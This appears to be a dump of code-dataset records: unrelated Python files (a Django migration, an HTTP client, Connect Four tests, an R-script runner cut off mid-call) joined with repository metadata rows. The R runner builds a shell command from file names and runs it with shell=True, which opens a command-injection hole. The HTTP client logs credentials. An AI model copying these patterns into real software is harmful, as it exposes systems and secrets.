field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='featuretypeconformitycheckrun',
name='feature_type',
field=models.ForeignKey(blank=True, help_text='the feature type targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='featuretype',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='featuretype_metadata', related_query_name='featuretype_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='featuretype',
name='output_formats',
field=models.ManyToManyField(blank=True, editable=False, help_text='This is a list of MIME types indicating the output formats that may be generated for a feature type. If this optional element is not specified, then all the result formats listed for the GetFeature operation are assumed to be supported. ', related_name='feature_types', related_query_name='feature_type', to='registry.MimeType', verbose_name='output formats'),
),
migrations.AddField(
model_name='featuretype',
name='reference_systems',
field=models.ManyToManyField(blank=True, editable=False, help_text='all reference systems which this element supports', related_name='featuretype', related_query_name='featuretype', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='featuretype',
name='service',
field=models.ForeignKey(editable=False, help_text='the extras service where this element is part of', on_delete=django.db.models.deletion.CASCADE, related_name='featuretypes', related_query_name='featuretype', to='registry.webfeatureservice', verbose_name='service'),
),
migrations.AddField(
model_name='dimension',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='the related dataset metadata of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_dimensions', related_query_name='dataset_metadata_dimension', to='registry.datasetmetadata', verbose_name='dataset metadata'),
),
migrations.AddField(
model_name='dimension',
name='feature_type',
field=models.ForeignKey(blank=True, help_text='the related feature type of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='feature_type_dimensions', related_query_name='feature_type_dimension', to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='dimension',
name='layer',
field=models.ForeignKey(blank=True, help_text='the related layer of this dimension entity', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='layer_dimensions', related_query_name='layer_dimension', to='registry.layer', verbose_name='layer'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='csw',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='dataset_metadata',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.datasetmetadata'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='feature_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.featuretype'),
),
migrations.AddField(
model_name='datasetmetadatarelation',
name='layer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.layer'),
),
migrations.AddField(
model_name='datasetmetadataconformitycheckrun',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='datasetmetadataconformitycheckrun',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='the dataset metadata targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.datasetmetadata', verbose_name='dataset metadata'),
),
migrations.AddField(
model_name='datasetmetadata',
name='dataset_contact',
field=models.ForeignKey(help_text='this is the contact which provides this dataset.', on_delete=django.db.models.deletion.RESTRICT, related_name='dataset_contact_metadata', related_query_name='dataset_contact_metadata', to='registry.metadatacontact', verbose_name='contact'),
),
migrations.AddField(
model_name='datasetmetadata',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='datasetmetadata_metadata', related_query_name='datasetmetadata_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='datasetmetadata',
name='licence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence'),
),
migrations.AddField(
model_name='datasetmetadata',
name='metadata_contact',
field=models.ForeignKey(help_text='this is the contact which is responsible for the metadata information of the dataset.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_metadata', related_query_name='metadata_contact_metadata', to='registry.metadatacontact', verbose_name='contact'),
),
migrations.AddField(
model_name='datasetmetadata',
name='reference_systems',
field=models.ManyToManyField(blank=True, related_name='dataset_metadata', related_query_name='dataset_metadata', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_catalouge_service',
field=models.ManyToManyField(blank=True, editable=False, help_text='all services from which this dataset was harvested.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.CatalougeService', verbose_name='services'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_feature_types',
field=models.ManyToManyField(blank=True, editable=False, help_text='all feature types which are linking to this dataset metadata in there capabilities.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.FeatureType', verbose_name='feature types'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_layers',
field=models.ManyToManyField(blank=True, editable=False, help_text='all layers which are linking to this dataset metadata in there capabilities.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.Layer', verbose_name='layers'),
),
migrations.AddField(
model_name='catalougeserviceoperationurl',
name='mime_types',
field=models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='catalougeserviceoperationurl_operation_urls', related_query_name='catalougeserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type'),
),
migrations.AddField(
model_name='catalougeserviceoperationurl',
name='service',
field=models.ForeignKey(editable=False, help_text='the catalouge service for that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.catalougeservice', verbose_name='related catalouge service'),
),
migrations.AddField(
model_name='catalougeserviceauthentication',
name='service',
field=models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.catalougeservice', verbose_name='web feature service'),
),
migrations.AddField(
model_name='catalougeservice',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='catalougeservice_metadata', related_query_name='catalougeservice_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='catalougeservice',
name='licence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence'),
),
migrations.AddField(
model_name='catalougeservice',
name='metadata_contact',
field=models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_catalougeservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='catalougeservice',
name='service_contact',
field=models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_catalougeservice_metadata', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='analyzedresponselog',
name='response',
field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, related_name='analyzed_response', related_query_name='analyzed_response', to='registry.httpresponselog'),
),
migrations.AddField(
model_name='allowedoperationgrouprelation',
name='allowed_operation',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.allowedoperation'),
),
migrations.AddField(
model_name='allowedoperationgrouprelation',
name='service_access_group',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='registry.serviceaccessgroup'),
),
migrations.AddField(
model_name='allowedoperation',
name='allowed_groups',
field=models.ManyToManyField(related_name='allowed_operations', related_query_name='allowed_operation', through='registry.AllowedOperationGroupRelation', to='registry.ServiceAccessGroup'),
),
migrations.AddField(
model_name='allowedoperation',
name='operations',
field=models.ManyToManyField(related_name='allowed_operations', related_query_name='allowed_operation', to='registry.OGCOperation'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_feature_types',
field=models.ManyToManyField(help_text='Select one or more feature types.', related_name='allowed_operations', related_query_name='allowed_operation', to='registry.FeatureType', verbose_name='secured feature types'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_layers',
field=models.ManyToManyField(help_text='Select one or more layers. Note that all sub layers of a selected layer will also be secured.', related_name='allowed_operations', related_query_name='allowed_operation', to='registry.Layer', verbose_name='secured layers'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_wfs',
field=models.ForeignKey(blank=True, help_text='the service where some layers or feature types are secured of.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='allowed_operations', related_query_name='allowed_operation', to='registry.webfeatureservice', verbose_name='secured service'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_wms',
field=models.ForeignKey(blank=True, help_text='the service where some layers or feature types are secured of.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='allowed_operations', related_query_name='allowed_operation', to='registry.webmapservice', verbose_name='secured service'),
),
migrations.AddConstraint(
model_name='proxysetting',
constraint=models.CheckConstraint(check=models.Q(models.Q(('camouflage', True), ('log_response', True)), models.Q(('camouflage', True), ('log_response', False)), models.Q(('camouflage', False), ('log_response', False)), _connector='OR'), name='registry_proxysetting_log_response_without_camouflage'),
),
migrations.AddConstraint(
model_name='datasetmetadatarelation',
constraint=models.CheckConstraint(check=models.Q(models.Q(models.Q(('csw', False)), _negated=True)), name='registry_datasetmetadatarelation_one_related_object_selected'),
),
migrations.AddConstraint(
model_name='datasetmetadata',
constraint=models.UniqueConstraint(fields=('dataset_id', 'dataset_id_code_space'), name='registry_datasetmetadata_unique_together_dataset_id_dataset_id_code_space'),
),
migrations.AddField(
model_name='conformitycheckconfigurationinternal',
name='mandatory_rule_sets',
field=models.ManyToManyField(related_name='mandatory_rule_sets', to='registry.RuleSet'),
),
migrations.AddField(
model_name='conformitycheckconfigurationinternal',
name='optional_rule_sets',
field=models.ManyToManyField(blank=True, related_name='optional_rule_sets', to='registry.RuleSet'),
),
]
| 92.013943 | 886 | 0.672674 | 13,634 | 118,790 | 5.708009 | 0.047015 | 0.051026 | 0.0294 | 0.038857 | 0.879033 | 0.852499 | 0.815492 | 0.798042 | 0.786618 | 0.76931 | 0 | 0.008358 | 0.197281 | 118,790 | 1,290 | 887 | 92.085271 | 0.807781 | 0.000379 | 0 | 0.738893 | 1 | 0.039751 | 0.365512 | 0.045611 | 0.007015 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005456 | 0.011691 | 0 | 0.014809 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1ec627ef58225573a438a89d6ccd9c5108fbce2d | 57 | py | Python | src/fireorm/utils/__init__.py | jerber/FireORM | bf224c79400c1f00c56d3dfbee14074371da8e74 | [
"MIT"
] | 5 | 2020-04-08T22:46:18.000Z | 2020-08-26T07:44:26.000Z | src/fireorm/utils/__init__.py | jerber/FireORM | bf224c79400c1f00c56d3dfbee14074371da8e74 | [
"MIT"
] | 1 | 2021-04-30T21:16:12.000Z | 2021-04-30T21:16:12.000Z | src/fireorm/utils/__init__.py | jerber/FireORM | bf224c79400c1f00c56d3dfbee14074371da8e74 | [
"MIT"
] | null | null | null | from fireorm.utils.make_update_obj import make_update_obj | 57 | 57 | 0.912281 | 10 | 57 | 4.8 | 0.7 | 0.416667 | 0.541667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 57 | 1 | 57 | 57 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
949968f63c74c317051c99be0b419882ca788dd5 | 4,230 | py | Python | rester/http.py | skyarch-networks/Rester | aaaf25320c11467d1089eb500567011b59a31864 | [
"MIT"
] | null | null | null | rester/http.py | skyarch-networks/Rester | aaaf25320c11467d1089eb500567011b59a31864 | [
"MIT"
] | null | null | null | rester/http.py | skyarch-networks/Rester | aaaf25320c11467d1089eb500567011b59a31864 | [
"MIT"
] | null | null | null | from logging import getLogger
from rester.struct import ResponseWrapper
import json
import requests
class HttpClient(object):
logger = getLogger(__name__)
ALLOWED_METHODS = ["get", "post", "put", "delete", "patch"]
def __init__(self, **kwargs):
self.extra_request_opts = kwargs
def request(self, api_url, method, headers, params, is_raw):
req_header = "{\n"
for key, value in headers.items():
req_header += (' {}: {}\n'.format(key, value))
req_header += " }"
self.logger.info(
'\n Invoking REST Call... \n api_url: %s,\n method: %s,\n headers: %s', api_url, method, req_header)
try:
func = getattr(requests, method)
except AttributeError:
self.logger.error('undefined HTTP method!!! %s', method)
raise
# String なら JSON として data に載せる
if isinstance(params, str):
try:
json.loads(params)
data = params
params = None
except json.decoder.JSONDecodeError:
data = None
else:
data = None
response = func(api_url, headers=headers, params=params, data=data, **self.extra_request_opts)
if is_raw or 'json' not in response.headers['content-type']:
payload = {"__raw__": response.text}
else:
payload = response.json()
if response.status_code < 300:
emit = self.logger.debug
else:
emit = self.logger.warn
Header = "Response Headers: \n{\n"
for key, value in response.headers.items():
Header += (' {}: {}\n'.format(key, value))
emit(Header + "}")
if is_raw:
emit('Response:\n%s\n' + response.text)
print(response.text)
else:
emit('Response:\n' + json.dumps(payload, sort_keys=True, indent=2) + '\n')
print(json.dumps(payload, sort_keys=True, indent=2))
return ResponseWrapper(response.status_code, payload, response.headers)
# Add aws request
def aws_request(self, api_url, method, headers, params, auth, is_raw):
req_header = "{\n"
for key, value in headers.items():
req_header += (' {}: {}\n'.format(key, value))
req_header += " }"
self.logger.info(
'\n Invoking REST Call... \n api_url: %s,\n method: %s,\n headers: %s,\n authrization: %s',
api_url, method, req_header, auth)
try:
func = getattr(requests, method)
except AttributeError:
self.logger.error('undefined HTTP method!!! %s', method)
raise
# String なら JSON として data に載せる
if isinstance(params, str):
try:
json.loads(params)
data = params
params = None
except json.decoder.JSONDecodeError:
data = params
params = None
else:
data = None
if isinstance(params, dict):
params_str = "&".join("%s=%s" % (k, v) for k, v in params.items())
response = func(api_url, headers=headers, params=params_str, data=data, auth=auth, **self.extra_request_opts)
else:
response = func(api_url, headers=headers, params=params, data=data, auth=auth, **self.extra_request_opts)
if is_raw or 'json' not in response.headers['content-type']:
payload = {"__raw__": response.text}
else:
payload = response.json()
if response.status_code < 300:
emit = self.logger.debug
else:
emit = self.logger.warn
Header = "Response Headers: \n{\n"
for key, value in response.headers.items():
Header += (' {}: {}\n'.format(key, value))
emit(Header + "}")
if is_raw:
emit('Response:\n%s\n' + response.text)
print(response.text)
else:
emit('Response:\n' + json.dumps(payload, sort_keys=True, indent=2) + '\n')
print(json.dumps(payload, sort_keys=True, indent=2))
return ResponseWrapper(response.status_code, payload, response.headers)
| 35.546218 | 121 | 0.551773 | 485 | 4,230 | 4.690722 | 0.206186 | 0.023736 | 0.028132 | 0.035165 | 0.843516 | 0.843516 | 0.824615 | 0.792967 | 0.754286 | 0.754286 | 0 | 0.003492 | 0.322931 | 4,230 | 118 | 122 | 35.847458 | 0.790852 | 0.017258 | 0 | 0.804124 | 0 | 0.020619 | 0.108355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030928 | false | 0 | 0.041237 | 0 | 0.123711 | 0.041237 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
94f692cc480497bc1f1dc62185e63713fe4d4c39 | 8,960 | py | Python | tests/test_agents_common_evaluate_windows_in_row.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_evaluate_windows_in_row.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | tests/test_agents_common_evaluate_windows_in_row.py | InesVogel/Connect4 | 9528115515fb33d107ebc26d4141a1d3effdca5e | [
"MIT"
] | null | null | null | from agents.common import PLAYER1, PLAYER2, initialize_game_state, apply_player_action, \
evaluate_windows_in_row, is_player_blocking_opponent
def test_evaluate_windows_in_row0_True_window0123():
game = initialize_game_state()
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER2)
apply_player_action(game, 2, PLAYER1)
apply_player_action(game, 3, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == True
def test_evaluate_windows_in_row0_False_window0123():
game = initialize_game_state()
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window1234():
game = initialize_game_state()
apply_player_action(game, 1, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER2)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window1234():
game = initialize_game_state()
apply_player_action(game, 1, PLAYER1)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window2345():
game = initialize_game_state()
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window2345():
game = initialize_game_state()
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window3456():
game = initialize_game_state()
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window3456():
game = initialize_game_state()
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window0123():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER2)
apply_player_action(game, 2, PLAYER1)
apply_player_action(game, 3, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == True
def test_evaluate_windows_in_row5_False_window0123():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window1234():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 1, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER2)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window1234():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window2345():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window2345():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window3456():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window3456():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window3456_lastActionOutOfBounds():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in (-1, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
| 34.329502 | 104 | 0.723884 | 1,324 | 8,960 | 4.515861 | 0.033233 | 0.112226 | 0.17344 | 0.210738 | 0.98294 | 0.98294 | 0.976919 | 0.968557 | 0.968557 | 0.954173 | 0 | 0.04382 | 0.190067 | 8,960 | 260 | 105 | 34.461538 | 0.780074 | 0 | 0 | 0.873563 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195402 | 1 | 0.097701 | false | 0 | 0.005747 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a229117ef0bc0f17f136628d0c26bdb8e9e86df5 | 104 | py | Python | Browser/_apps/mail/main.py | iTecAI/BrowserHack | 5a1da1b397f763148fb23538182c284b40259a01 | [
"MIT"
] | null | null | null | Browser/_apps/mail/main.py | iTecAI/BrowserHack | 5a1da1b397f763148fb23538182c284b40259a01 | [
"MIT"
] | null | null | null | Browser/_apps/mail/main.py | iTecAI/BrowserHack | 5a1da1b397f763148fb23538182c284b40259a01 | [
"MIT"
] | null | null | null | def run(url):
return 'self.addTab(url="https://mail.google.com/mail/u/0/?view=cm&fs=1&tf=1&su=")'
| 34.666667 | 88 | 0.634615 | 21 | 104 | 3.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031915 | 0.096154 | 104 | 2 | 89 | 52 | 0.670213 | 0 | 0 | 0 | 0 | 0.5 | 0.72549 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
bf922681af2d188b17ae4ccb3dbb7157b39adb76 | 6,529 | py | Python | src/avg_utils/luigi_avg_rtask_utils.py | SebVaca/avg_utils | 28bd61b8486e571f7b9cec47c9f71e0bbbe0bc01 | [
"BSD-2-Clause"
] | null | null | null | src/avg_utils/luigi_avg_rtask_utils.py | SebVaca/avg_utils | 28bd61b8486e571f7b9cec47c9f71e0bbbe0bc01 | [
"BSD-2-Clause"
] | null | null | null | src/avg_utils/luigi_avg_rtask_utils.py | SebVaca/avg_utils | 28bd61b8486e571f7b9cec47c9f71e0bbbe0bc01 | [
"BSD-2-Clause"
] | null | null | null | import subprocess
import pandas as pd
import os
import multiprocessing as mp
def generate_subprocess_call_for_a_analyte(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates the command to be passed to the subprocess module.
The command is created for a given analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
:returns: subprocess_call_for_r_script
"""
R_SCRIPT_PATH = "Rscript"
subprocess_call_for_r_script = str(
R_SCRIPT_PATH +
' "/usr/local/src/AvG_for_Terra.R" ' +
' "' + os.path.join(csv_ds_root_path, 'data_analyte_' + str(hashed_id) + '.csv') + '" ' +
' "' + str(params_file_path) + '" ' +
' "' + str(hashed_id) + '" ' +
' "' + str(output_dir) + '" ')
return subprocess_call_for_r_script
def run_r_script_for_an_analyte(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates a command and passes it to the subprocess module.
The R script is run using the data for a analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
"""
subprocess_call_for_r_script = generate_subprocess_call_for_a_analyte(
hashed_id, csv_ds_root_path, params_file_path, output_dir)
# print('subcall:' + subprocess_call_for_r_script)
subprocess.call(subprocess_call_for_r_script, shell=True)
def run_r_script_for_all_analytes(csv_ds_root_path, params_file_path, output_dir):
""" Run the avant-garde R script for all analytes. Reads the 'ID_Analyte_glossary' file, that contains all
hashed id values for all the analytes and iterates through it.
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file that is used as a _SUCCESS file
to be written in R to make sure that the script ran without errors.
"""
dd = [w.replace('data_analyte_', '') for w in os.listdir(csv_ds_root_path)]
dd = [w.replace('.csv', '') for w in dd]
dd = pd.DataFrame(dd, columns=['ID_Analyte'])
# dd['ID_Analyte'].map(lambda x: run_r_script_for_an_analyte(
# hashed_id=x,
# csv_ds_root_path=csv_ds_root_path,
# params_file_path=params_file_path,
# output_dir=output_dir))
pool = mp.Pool(mp.cpu_count())
num_analytes = len(dd['ID_Analyte'])
pool.starmap(run_r_script_for_an_analyte,
